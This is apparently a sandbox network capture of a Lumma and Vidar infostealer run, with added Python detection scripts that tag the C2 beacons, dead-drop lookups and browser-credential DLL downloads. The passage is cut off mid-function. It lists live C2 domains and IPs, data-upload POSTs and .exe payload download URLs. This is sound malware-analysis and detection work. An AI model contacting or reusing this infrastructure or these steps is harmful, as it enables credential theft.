    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 352234
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 0293A89D391C4388AD3AAF5E1481FF5F Ref B: LON04EDGE0818 Ref C: 2024-09-19T23:34:44Z
    date: Thu, 19 Sep 2024 23:34:43 GMT
  • [US] GET https://tse1.mm.bing.net/th?id=OADD2.10239317301330_16DHBP5UB5EI8DA4M&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90  remote 150.171.27.10:443
    Request
    GET /th?id=OADD2.10239317301330_16DHBP5UB5EI8DA4M&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 306374
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 3B6B907B8D2044BABA6EA064559D8A45 Ref B: LON04EDGE0818 Ref C: 2024-09-19T23:34:44Z
    date: Thu, 19 Sep 2024 23:34:43 GMT
  • [US] GET https://tse1.mm.bing.net/th?id=OADD2.10239340418582_18ZLZW09JZ7BHXRKX&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90  remote 150.171.27.10:443
    Request
    GET /th?id=OADD2.10239340418582_18ZLZW09JZ7BHXRKX&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 241999
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: DACDDEDEBED64363B125B1D477AE346E Ref B: LON04EDGE0818 Ref C: 2024-09-19T23:34:44Z
    date: Thu, 19 Sep 2024 23:34:43 GMT
  • [US] DNS  174.117.168.52.in-addr.arpa  via 8.8.8.8:53
    Q: 174.117.168.52.in-addr.arpa IN PTR
    A: (none)
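What the request dumps above add up to, written out here as an added example that is not part of the sandbox report or of the sandbox's own signatures: one process, RegAsm.exe, speaks two C2 dialects. The Lumma beacons are POSTs to /api on Cloudflare-fronted .shop domains from the extracted config, each with an 8-byte urlencoded body (the capture shows only the length) and a Windows Chrome/119 User-Agent. The Vidar session is a run of multipart POSTs to the bare IP 116.202.0.195 whose boundary is "----" plus 20 letters drawn from A to K, sent with the macOS/Opera User-Agent from the Vidar config even though the host is a Windows 10 VM; it is preceded by dead-drop lookups on t.me/edm0d and a steamcommunity.com profile (the profile fetched, 76561199724331900, is not the one in the extracted config) and followed by the NSS and VC runtime DLLs (nss3, freebl3, softokn3, mozglue, msvcp140, vcruntime140) that Vidar-family stealers use to read Firefox credential stores. The script below turns those observations into tags. Its sample requests are constructed from the headers in this capture; the function names, tag strings, boundary regex and DLL set are this example's own assumptions, not a vendor signature.

```python
"""Tag the Lumma and Vidar C2 requests seen in this capture.
Added example, not part of the sandbox report or its signatures; the sample
requests below are constructed from the headers shown in the capture, and the
tag names, boundary pattern and DLL set are this example's own assumptions."""
import re
from dataclasses import dataclass
from urllib.parse import urlparse

@dataclass
class Request:
    method: str
    path: str
    headers: dict  # header names lower-cased

def parse_request(raw: str) -> Request:
    """Parse a request dump (HTTP/1.x or h2-style): request line, then headers."""
    lines = raw.strip().splitlines()
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break  # end of headers; the body is not parsed
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return Request(method, path, headers)

# Vidar's multipart boundary in this capture: "----" plus 20 letters from A to K.
VIDAR_BOUNDARY = re.compile(r"^----[A-K]{20}$")
IPV4_HOST = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
# Dead-drop resolver hosts taken from the Vidar config in this report.
DEAD_DROP_HOSTS = {"t.me", "steamcommunity.com"}
# NSS/VC runtime DLLs fetched from the Vidar C2 after check-in (connection summary).
NSS_STAGING = {"freebl3.dll", "mozglue.dll", "msvcp140.dll",
               "nss3.dll", "softokn3.dll", "vcruntime140.dll"}

def classify(req: Request, host_os: str = "Windows") -> list:
    """Return the indicator tags one request matches (empty list for benign noise)."""
    h, tags = req.headers, []
    host, ua, ctype = h.get("host", ""), h.get("user-agent", ""), h.get("content-type", "")
    # Lumma: POST /api, urlencoded, 8-byte body (the capture shows only the length).
    if (req.method == "POST" and req.path == "/api"
            and ctype.startswith("application/x-www-form-urlencoded")
            and h.get("content-length") == "8"):
        tags.append("lumma:beacon")
    m = re.search(r"boundary=(\S+)", ctype)
    if req.method == "POST" and m and VIDAR_BOUNDARY.match(m.group(1)):
        tags.append("vidar:multipart-boundary")
    if IPV4_HOST.match(host):  # C2 addressed by bare IP rather than a domain
        tags.append("http:bare-ip-host")
    if host_os == "Windows" and "Macintosh" in ua:  # UA claims macOS on a Windows VM
        tags.append("ua:platform-mismatch")
    if req.method == "GET" and host in DEAD_DROP_HOSTS:
        tags.append("vidar:dead-drop-lookup")
    return tags

def nss_staging_hosts(urls) -> list:
    """Hosts from which the complete NSS_STAGING DLL set was fetched."""
    seen = {}
    for url in urls:
        p = urlparse(url)
        name = p.path.rsplit("/", 1)[-1].lower()
        if name in NSS_STAGING:
            seen.setdefault(p.hostname, set()).add(name)
    return sorted(h for h, names in seen.items() if names == NSS_STAGING)

# Constructed samples: headers copied from the request dumps in this capture.
LUMMA_BEACON = """POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: opponnentduei.shop
"""
VIDAR_POST = """POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----CBFBKFIDHIDGHJKFBGHC
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
Host: 116.202.0.195
Content-Length: 499
Connection: Keep-Alive
Cache-Control: no-cache
"""
STEAM_GET = """GET /profiles/76561199724331900 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com
"""
BING_GET = """GET /th?id=OADD2.10239340418581_1PW4UWMX6DVDU64ZR&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
"""
DOWNLOADS = [  # GET URLs from the connection summary
    "https://116.202.0.195/sqlp.dll", "https://116.202.0.195/freebl3.dll",
    "https://116.202.0.195/mozglue.dll", "https://116.202.0.195/msvcp140.dll",
    "https://116.202.0.195/softokn3.dll", "https://116.202.0.195/vcruntime140.dll",
    "https://116.202.0.195/nss3.dll", "http://147.45.44.104/prog/66ecb44c35444_vfdhsgdf.exe",
]

if __name__ == "__main__":
    for name, raw in [("lumma", LUMMA_BEACON), ("vidar", VIDAR_POST),
                      ("steam", STEAM_GET), ("bing", BING_GET)]:
        print(f"{name:6} {classify(parse_request(raw))}")
    print("NSS staging from:", nss_staging_hosts(DOWNLOADS))
```

Run as a script it prints the tags for each sample. The Bing sample (one of the OADD2 image fetches from tse1.mm.bing.net, which carry no owning process in the capture) yields no tags; that is the check that the rules stay quiet on the VM's own background traffic. A single tag is weak on its own, since any browser may GET t.me; the Vidar call rests on the conjunction of boundary shape, bare-IP host and platform mismatch on one connection, and the complete DLL set from the same host confirms it.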
  Per-connection totals, sent / received: bytes, then packets (the 2.5MB received on the sqlp.dll row matches its Content-Length of 2459136). Every row is RegAsm.exe.
  • 149.154.167.99:443  https://t.me/edm0d  tls, http  RegAsm.exe  sent 1.5kB (24 pkts)  recv 19.4kB (20 pkts)
    GET https://t.me/edm0d → 200
  • 116.202.0.195:443  https://116.202.0.195/  tls, http  RegAsm.exe  sent 1.0kB (11 pkts)  recv 2.7kB (8 pkts)
    GET https://116.202.0.195/ → 200
  • 116.202.0.195:443  https://116.202.0.195/  tls, http  RegAsm.exe  sent 1.5kB (10 pkts)  recv 622 B (6 pkts)
    POST https://116.202.0.195/ → 200
  • 116.202.0.195:443  https://116.202.0.195/  tls, http  RegAsm.exe  sent 1.6kB (11 pkts)  recv 2.6kB (8 pkts)
    POST https://116.202.0.195/ → 200
  • 116.202.0.195:443  https://116.202.0.195/  tls, http  RegAsm.exe  sent 1.7kB (14 pkts)  recv 6.4kB (10 pkts)
    POST https://116.202.0.195/ → 200
  • 116.202.0.195:443  https://116.202.0.195/  tls, http  RegAsm.exe  sent 1.5kB (9 pkts)  recv 672 B (6 pkts)
    POST https://116.202.0.195/ → 200
  • 116.202.0.195:443  https://116.202.0.195/  tls, http  RegAsm.exe  sent 6.0kB (13 pkts)  recv 645 B (8 pkts)
    POST https://116.202.0.195/ → 200
  • 116.202.0.195:443  https://116.202.0.195/sqlp.dll  tls, http  RegAsm.exe  sent 95.8kB (1839 pkts)  recv 2.5MB (1833 pkts)
    GET https://116.202.0.195/sqlp.dll → 200
  • 116.202.0.195:443  https://116.202.0.195/  tls, http  RegAsm.exe  sent 1.6kB (9 pkts)  recv 565 B (6 pkts)
    POST https://116.202.0.195/ → 200
  • 116.202.0.195:443  https://116.202.0.195/  tls, http  RegAsm.exe  sent 1.6kB (9 pkts)  recv 565 B (6 pkts)
    POST https://116.202.0.195/ → 200
  • 116.202.0.195:443  https://116.202.0.195/freebl3.dll  tls, http  RegAsm.exe  sent 24.4kB (517 pkts)  recv 707.6kB (515 pkts)
    GET https://116.202.0.195/freebl3.dll → 200
  • 116.202.0.195:443  https://116.202.0.195/mozglue.dll  tls, http  RegAsm.exe  sent 21.8kB (460 pkts)  recv 627.9kB (457 pkts)
    GET https://116.202.0.195/mozglue.dll → 200
  • 116.202.0.195:443  https://116.202.0.195/msvcp140.dll  tls, http  RegAsm.exe  sent 16.3kB (341 pkts)  recv 464.7kB (338 pkts)
    GET https://116.202.0.195/msvcp140.dll → 200
  • 116.202.0.195:443  https://116.202.0.195/softokn3.dll  tls, http  RegAsm.exe  sent 9.8kB (199 pkts)  recv 266.6kB (196 pkts)
    GET https://116.202.0.195/softokn3.dll → 200
  • 116.202.0.195:443  https://116.202.0.195/vcruntime140.dll  tls, http  RegAsm.exe  sent 3.8kB (68 pkts)  recv 84.0kB (65 pkts)
    GET https://116.202.0.195/vcruntime140.dll → 200
  • 116.202.0.195:443  https://116.202.0.195/nss3.dll  tls, http  RegAsm.exe  sent 70.9kB (1528 pkts)  recv 2.1MB (1524 pkts)
    GET https://116.202.0.195/nss3.dll → 200
  • 116.202.0.195:443  https://116.202.0.195/  tls, http  RegAsm.exe  sent 2.3kB (10 pkts)  recv 605 B (7 pkts)
    POST https://116.202.0.195/ → 200
  • 116.202.0.195:443  https://116.202.0.195/  tls, http  RegAsm.exe  sent 1.5kB (10 pkts)  recv 2.8kB (7 pkts)
    POST https://116.202.0.195/ → 200
  • 116.202.0.195:443  https://116.202.0.195/  tls, http  RegAsm.exe  sent 1.5kB (10 pkts)  recv 2.1kB (7 pkts)
    POST https://116.202.0.195/ → 200
  • 116.202.0.195:443  https://116.202.0.195/  tls, http  RegAsm.exe  sent 1.6kB (9 pkts)  recv 565 B (6 pkts)
    POST https://116.202.0.195/ → 200
  • 116.202.0.195:443  https://116.202.0.195/  tls, http  RegAsm.exe  sent 125.8kB (99 pkts)  recv 2.4kB (52 pkts)
    POST https://116.202.0.195/ → 200
  • 116.202.0.195:443  https://116.202.0.195/  tls, http  RegAsm.exe  sent 1.5kB (9 pkts)  recv 748 B (6 pkts)
    POST https://116.202.0.195/ → 200
  • 147.45.44.104:80  http://147.45.44.104/prog/66ecb44c35444_vfdhsgdf.exe  http  RegAsm.exe  sent 23.6kB (500 pkts)  recv 688.4kB (495 pkts)
    GET http://147.45.44.104/prog/66ecb454d2b4a_lgfdsjgds.exe → 200
    GET http://147.45.44.104/prog/66ecb44c35444_vfdhsgdf.exe → 200
  • 172.67.204.62:443  https://questionmwq.shop/api  tls, http  RegAsm.exe  sent 1.0kB (9 pkts)  recv 4.5kB (9 pkts)
    POST https://questionmwq.shop/api → 200
  • 172.67.173.81:443  https://chickerkuso.shop/api  tls, http  RegAsm.exe  sent 1.2kB (10 pkts)  recv 4.5kB (9 pkts)
    POST https://chickerkuso.shop/api → 200
  • 104.21.39.77:443  https://achievenmtynwjq.shop/api  tls, http  RegAsm.exe  sent 1.2kB (11 pkts)  recv 5.0kB (10 pkts)
    POST https://achievenmtynwjq.shop/api → 200
  • 172.67.211.222:443  https://puredoffustow.shop/api  tls, http  RegAsm.exe  sent 1.0kB (9 pkts)  recv 4.6kB (9 pkts)
    POST https://puredoffustow.shop/api → 200
  • 172.67.209.183:443
    https://opponnentduei.shop/api
    tls, http
    RegAsm.exe
    1.0kB
    4.5kB
    9
    9

    HTTP Request

    POST https://opponnentduei.shop/api

    HTTP Response

    200
  • 104.21.75.242:443
    https://metallygaricwo.shop/api
    tls, http
    RegAsm.exe
    1.0kB
    4.5kB
    9
    9

    HTTP Request

    POST https://metallygaricwo.shop/api

    HTTP Response

    200
  • 104.21.50.100:443
    https://milldymarskwom.shop/api
    tls, http
    RegAsm.exe
    1.0kB
    4.6kB
    9
    9

    HTTP Request

    POST https://milldymarskwom.shop/api

    HTTP Response

    200
  • 104.21.37.45:443
    https://quotamkdsdqo.shop/api
    tls, http
    RegAsm.exe
    1.0kB
    4.6kB
    9
    9

    HTTP Request

    POST https://quotamkdsdqo.shop/api

    HTTP Response

    200
  • 116.202.0.195:443
    https://116.202.0.195/
    tls, http
    RegAsm.exe
    1.6kB
    525 B
    8
    5

    HTTP Request

    POST https://116.202.0.195/

    HTTP Response

    200
  • 172.67.192.105:443
    https://carrtychaintnyw.shop/api
    tls, http
    RegAsm.exe
    1.0kB
    4.6kB
    9
    9

    HTTP Request

    POST https://carrtychaintnyw.shop/api

    HTTP Response

    200
  • 104.82.131.75:443
    https://steamcommunity.com/profiles/76561199724331900
    tls, http
    RegAsm.exe
    1.5kB
    42.2kB
    21
    36

    HTTP Request

    GET https://steamcommunity.com/profiles/76561199724331900

    HTTP Response

    200
  • 116.202.0.195:443
    https://116.202.0.195/
    tls, http
    RegAsm.exe
    1.4kB
    518 B
    8
    5

    HTTP Request

    POST https://116.202.0.195/

    HTTP Response

    200
  • 149.154.167.99:443
    https://t.me/edm0d
    tls, http
    RegAsm.exe
    1.5kB
    19.2kB
    24
    20

    HTTP Request

    GET https://t.me/edm0d

    HTTP Response

    200
  • 116.202.0.195:443
    https://116.202.0.195/
    tls, http
    RegAsm.exe
    1.0kB
    2.7kB
    11
    8

    HTTP Request

    GET https://116.202.0.195/

    HTTP Response

    200
  • 116.202.0.195:443
    https://116.202.0.195/
    tls, http
    RegAsm.exe
    1.4kB
    622 B
    9
    6

    HTTP Request

    POST https://116.202.0.195/

    HTTP Response

    200
  • 116.202.0.195:443
    https://116.202.0.195/
    tls, http
    RegAsm.exe
    1.5kB
    2.2kB
    10
    7

    HTTP Request

    POST https://116.202.0.195/

    HTTP Response

    200
  • 116.202.0.195:443
    https://116.202.0.195/
    tls, http
    RegAsm.exe
    1.7kB
    6.4kB
    13
    10

    HTTP Request

    POST https://116.202.0.195/

    HTTP Response

    200
  • 116.202.0.195:443
    https://116.202.0.195/
    tls, http
    RegAsm.exe
    1.5kB
    672 B
    9
    6

    HTTP Request

    POST https://116.202.0.195/

    HTTP Response

    200
  • 116.202.0.195:443
    https://116.202.0.195/
    tls, http
    RegAsm.exe
    6.1kB
    645 B
    13
    8

    HTTP Request

    POST https://116.202.0.195/

    HTTP Response

    200
  • 116.202.0.195:443
    https://116.202.0.195/sqlp.dll
    tls, http
    RegAsm.exe
    85.1kB
    2.5MB
    1835
    1828

    HTTP Request

    GET https://116.202.0.195/sqlp.dll

    HTTP Response

    200
  • 116.202.0.195:443
    https://116.202.0.195/
    tls, http
    RegAsm.exe
    1.5kB
    528 B
    8
    5

    HTTP Request

    POST https://116.202.0.195/

    HTTP Response

    200
  • 150.171.27.10:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    6.9kB
    15
    13
  • 150.171.27.10:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    6.9kB
    15
    13
  • 150.171.27.10:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    6.9kB
    15
    13
  • 150.171.27.10:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    6.9kB
    15
    13
  • 150.171.27.10:443
    https://tse1.mm.bing.net/th?id=OADD2.10239340418582_18ZLZW09JZ7BHXRKX&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    tls, http2
    75.7kB
    2.1MB
    1564
    1562

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239340418581_1PW4UWMX6DVDU64ZR&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239317300897_1II1YIPQNQ7MCYUAK&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239317301611_1E01O38L32FSSHIRP&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239317301202_1RQN0RMZHNRAOB7W6&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239317301330_16DHBP5UB5EI8DA4M&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239340418582_18ZLZW09JZ7BHXRKX&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Response

    200
  • 8.8.8.8:53
    58.55.71.13.in-addr.arpa
    dns
    70 B
    144 B
    1
    1

    DNS Request

    58.55.71.13.in-addr.arpa

  • 8.8.8.8:53
    172.214.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.214.232.199.in-addr.arpa

  • 8.8.8.8:53
    67.31.126.40.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    67.31.126.40.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    t.me
    dns
    RegAsm.exe
    50 B
    66 B
    1
    1

    DNS Request

    t.me

    DNS Response

    149.154.167.99

  • 8.8.8.8:53
    55.36.223.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    55.36.223.20.in-addr.arpa

  • 8.8.8.8:53
    99.167.154.149.in-addr.arpa
    dns
    73 B
    166 B
    1
    1

    DNS Request

    99.167.154.149.in-addr.arpa

  • 8.8.8.8:53
    41.249.124.192.in-addr.arpa
    dns
    73 B
    113 B
    1
    1

    DNS Request

    41.249.124.192.in-addr.arpa

  • 8.8.8.8:53
    195.0.202.116.in-addr.arpa
    dns
    72 B
    129 B
    1
    1

    DNS Request

    195.0.202.116.in-addr.arpa

  • 8.8.8.8:53
    28.118.140.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    28.118.140.52.in-addr.arpa

  • 8.8.8.8:53
    133.211.185.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    133.211.185.52.in-addr.arpa

  • 8.8.8.8:53
    104.44.45.147.in-addr.arpa
    dns
    72 B
    127 B
    1
    1

    DNS Request

    104.44.45.147.in-addr.arpa

  • 8.8.8.8:53
    questionmwq.shop
    dns
    RegAsm.exe
    62 B
    94 B
    1
    1

    DNS Request

    questionmwq.shop

    DNS Response

    172.67.204.62
    104.21.85.92

  • 8.8.8.8:53
    62.204.67.172.in-addr.arpa
    dns
    72 B
    134 B
    1
    1

    DNS Request

    62.204.67.172.in-addr.arpa

  • 8.8.8.8:53
    chickerkuso.shop
    dns
    RegAsm.exe
    62 B
    94 B
    1
    1

    DNS Request

    chickerkuso.shop

    DNS Response

    172.67.173.81
    104.21.88.61

  • 8.8.8.8:53
    achievenmtynwjq.shop
    dns
    RegAsm.exe
    66 B
    98 B
    1
    1

    DNS Request

    achievenmtynwjq.shop

    DNS Response

    104.21.39.77
    172.67.143.200

  • 8.8.8.8:53
    81.173.67.172.in-addr.arpa
    dns
    72 B
    134 B
    1
    1

    DNS Request

    81.173.67.172.in-addr.arpa

  • 8.8.8.8:53
    puredoffustow.shop
    dns
    RegAsm.exe
    64 B
    96 B
    1
    1

    DNS Request

    puredoffustow.shop

    DNS Response

    172.67.211.222
    104.21.85.226

  • 8.8.8.8:53
    opponnentduei.shop
    dns
    RegAsm.exe
    64 B
    96 B
    1
    1

    DNS Request

    opponnentduei.shop

    DNS Response

    172.67.209.183
    104.21.45.51

  • 8.8.8.8:53
    77.39.21.104.in-addr.arpa
    dns
    71 B
    133 B
    1
    1

    DNS Request

    77.39.21.104.in-addr.arpa

  • 8.8.8.8:53
    222.211.67.172.in-addr.arpa
    dns
    73 B
    135 B
    1
    1

    DNS Request

    222.211.67.172.in-addr.arpa

  • 8.8.8.8:53
    metallygaricwo.shop
    dns
    RegAsm.exe
    65 B
    97 B
    1
    1

    DNS Request

    metallygaricwo.shop

    DNS Response

    104.21.75.242
    172.67.184.9

  • 8.8.8.8:53
    milldymarskwom.shop
    dns
    RegAsm.exe
    65 B
    97 B
    1
    1

    DNS Request

    milldymarskwom.shop

    DNS Response

    104.21.50.100
    172.67.204.182

  • 8.8.8.8:53
    quotamkdsdqo.shop
    dns
    RegAsm.exe
    63 B
    95 B
    1
    1

    DNS Request

    quotamkdsdqo.shop

    DNS Response

    104.21.37.45
    172.67.203.241

  • 8.8.8.8:53
    242.75.21.104.in-addr.arpa
    dns
    72 B
    134 B
    1
    1

    DNS Request

    242.75.21.104.in-addr.arpa

  • 8.8.8.8:53
    183.209.67.172.in-addr.arpa
    dns
    73 B
    135 B
    1
    1

    DNS Request

    183.209.67.172.in-addr.arpa

  • 8.8.8.8:53
    100.50.21.104.in-addr.arpa
    dns
    72 B
    134 B
    1
    1

    DNS Request

    100.50.21.104.in-addr.arpa

  • 8.8.8.8:53
    45.37.21.104.in-addr.arpa
    dns
    71 B
    133 B
    1
    1

    DNS Request

    45.37.21.104.in-addr.arpa

  • 8.8.8.8:53
    carrtychaintnyw.shop
    dns
    RegAsm.exe
    66 B
    98 B
    1
    1

    DNS Request

    carrtychaintnyw.shop

    DNS Response

    172.67.192.105
    104.21.81.254

  • 8.8.8.8:53
    steamcommunity.com
    dns
    RegAsm.exe
    64 B
    80 B
    1
    1

    DNS Request

    steamcommunity.com

    DNS Response

    104.82.131.75

  • 8.8.8.8:53
    genedjestytw.shop
    dns
    RegAsm.exe
    63 B
    120 B
    1
    1

    DNS Request

    genedjestytw.shop

  • 8.8.8.8:53
    105.192.67.172.in-addr.arpa
    dns
    73 B
    135 B
    1
    1

    DNS Request

    105.192.67.172.in-addr.arpa

  • 8.8.8.8:53
    75.131.82.104.in-addr.arpa
    dns
    72 B
    137 B
    1
    1

    DNS Request

    75.131.82.104.in-addr.arpa

  • 8.8.8.8:53
    gacan.zapto.org
    dns
    RegAsm.exe
    61 B
    121 B
    1
    1

    DNS Request

    gacan.zapto.org

  • 8.8.8.8:53
    t.me
    dns
    RegAsm.exe
    50 B
    66 B
    1
    1

    DNS Request

    t.me

    DNS Response

    149.154.167.99

  • 8.8.8.8:53
    50.23.12.20.in-addr.arpa
    dns
    70 B
    156 B
    1
    1

    DNS Request

    50.23.12.20.in-addr.arpa

  • 8.8.8.8:53
    198.187.3.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    198.187.3.20.in-addr.arpa

  • 8.8.8.8:53
    18.134.221.88.in-addr.arpa
    dns
    72 B
    137 B
    1
    1

    DNS Request

    18.134.221.88.in-addr.arpa

  • 8.8.8.8:53
    25.140.123.92.in-addr.arpa
    dns
    72 B
    137 B
    1
    1

    DNS Request

    25.140.123.92.in-addr.arpa

  • 8.8.8.8:53
    48.229.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    48.229.111.52.in-addr.arpa

  • 8.8.8.8:53
    205.47.74.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    205.47.74.20.in-addr.arpa

  • 8.8.8.8:53
    tse1.mm.bing.net
    dns
    124 B
    340 B
    2
    2

    DNS Request

    tse1.mm.bing.net

    DNS Request

    tse1.mm.bing.net

    DNS Response

    150.171.27.10
    150.171.28.10

    DNS Response

    150.171.28.10
    150.171.27.10

  • 8.8.8.8:53
    174.117.168.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    174.117.168.52.in-addr.arpa

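The connection list above is flat: each bullet is one endpoint, then the URL or host, the protocols, the originating process (absent for OS background traffic such as the tse1.mm.bing.net fetches), bytes sent, bytes received, packets sent, packets received, and finally the HTTP request/response or DNS request/response pairs. The following parser and triage rules are an added example written for this page, not part of the sandbox report or of any vendor tooling. The sample input is an excerpt of the report's own records with blank and response lines dropped; the field order the parser assumes, the thresholds (50 kB for a suspicious POST body, two NSS DLLs from one host, three distinct /api hosts from one process) and the rule names are the author's assumptions.

```python
import re

# Excerpt of the report's connection records (copied from the page above,
# blank lines and "HTTP Response"/"200" lines dropped for brevity).
SAMPLE = """\
• 116.202.0.195:443
  https://116.202.0.195/mozglue.dll
  tls, http
  RegAsm.exe
  21.8kB
  627.9kB
  460
  457
  HTTP Request
  GET https://116.202.0.195/mozglue.dll
• 116.202.0.195:443
  https://116.202.0.195/nss3.dll
  tls, http
  RegAsm.exe
  70.9kB
  2.1MB
  1528
  1524
  HTTP Request
  GET https://116.202.0.195/nss3.dll
• 116.202.0.195:443
  https://116.202.0.195/
  tls, http
  RegAsm.exe
  125.8kB
  2.4kB
  99
  52
  HTTP Request
  POST https://116.202.0.195/
• 104.82.131.75:443
  https://steamcommunity.com/profiles/76561199724331900
  tls, http
  RegAsm.exe
  1.5kB
  42.2kB
  21
  36
  HTTP Request
  GET https://steamcommunity.com/profiles/76561199724331900
"""

SIZE_RE = re.compile(r"^(\d+(?:\.\d+)?)\s*([kM]?)B$")
UNITS = {"": 1, "k": 1000, "M": 1_000_000}
# Mozilla NSS/sqlite libraries (plus the VC runtime they need) that Vidar pulls
# from its C2 host to read browser credential stores on the victim.
NSS_DLLS = {"nss3.dll", "freebl3.dll", "softokn3.dll", "mozglue.dll",
            "sqlp.dll", "msvcp140.dll", "vcruntime140.dll"}
DEAD_DROPS = ("steamcommunity.com/profiles/", "t.me/")  # C2-address lookup pages

def parse_size(s):
    m = SIZE_RE.match(s.strip())
    return int(round(float(m.group(1)) * UNITS[m.group(2)]))

def parse_records(text):
    """Turn the bullet list into dicts; the process name is optional."""
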